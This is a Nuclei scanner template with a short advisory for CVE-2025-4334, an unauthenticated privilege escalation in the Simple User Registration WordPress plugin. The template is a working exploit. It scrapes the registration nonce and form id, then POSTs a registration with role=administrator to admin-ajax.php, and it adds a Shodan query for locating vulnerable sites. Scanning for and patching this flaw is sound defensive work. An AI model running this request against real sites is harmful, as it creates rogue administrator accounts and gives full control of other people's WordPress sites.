Vulnerability description
The Simple User Registration plugin for WordPress, in versions up to and including 6.3, is vulnerable to privilege escalation. The registration handler does not restrict which user meta values a submitter may set, so an unauthenticated attacker can add a role field set to administrator to the ordinary registration form and create an administrator account.
id: CVE-2025-4334

info:
  name: Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation
  author: pussycat0x
  severity: critical
  description: |
    The Simple User Registration plugin ≤ 6.3 is vulnerable to privilege escalation. It lacks proper restrictions on user meta values during registration. Unauthenticated attackers can exploit this to register as administrators.
  reference:
    - https://github.com/Nxploited/CVE-2025-4334
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-4334
    epss-score: 0.15409
    epss-percentile: 0.94408
    cwe-id: CWE-269
  impact: |
    An attacker can exploit this vulnerability to register with administrator privileges, gaining full control over the WordPress site.
  remediation: |
    Update the Simple User Registration plugin to a version newer than 6.3 when available, or remove the plugin if not essential.
  metadata:
    verified: true
    max-request: 2
    vendor: lifeisincredible
    product: simple-user-registration
    shodan-query: http.component:"wordpress" && http.html:"/wp-content/plugins/simple-user-registration/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,simple-user-registration

variables:
  username: "{{randstr}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  password: "{{to_lower(rand_text_alpha(8))}}"
http:
  - raw:
      - |
        GET /register/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        action=wpr_submit_form&wpr_form_id={{wpr_form_id}}&wpr_nonce={{wpr_nonce}}&_wp_http_referer=%2Fregister%2F&wpr%5Bwp_field%5D%5Buser_login%5D={{username}}&wpr%5Bwp_field%5D%5Bfirst_name%5D=first{{username}}&wpr%5Bwp_field%5D%5Blast_name%5D=last{{username}}&wpr%5Bwp_field%5D%5Buser_email%5D={{email}}&wpr%5Bwp_field%5D%5Bpassword%5D={{password}}&wpr%5Bwp_field%5D%5Bconfirm_password%5D={{password}}&wpr%5Bwp_field%5D%5Brole%5D=administrator
    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "WPR Register")
          - contains(body_2, "user_id")
          - contains(body_2, "Registration Done")
        condition: and

    extractors:
      - type: regex
        internal: true
        group: 1
        name: wpr_nonce
        part: body
        regex:
          - 'name="wpr_nonce" value="([a-f0-9]+)"'

      - type: regex
        internal: true
        group: 1
        name: wpr_form_id
        part: body
        regex:
          - 'name="wpr_form_id" value="([0-9]+)"'
# digest: 4a0a0047304502203eab5ee2fb62a689e64964e12a992fc5d411cb845a860fc4bf716506598347f9022100a9805be3b7b408fa0f1c2662e71d19625455ee6cff66b9ed16bf3f19aa74eea3:922c64590222798bb761d5b6d8e72950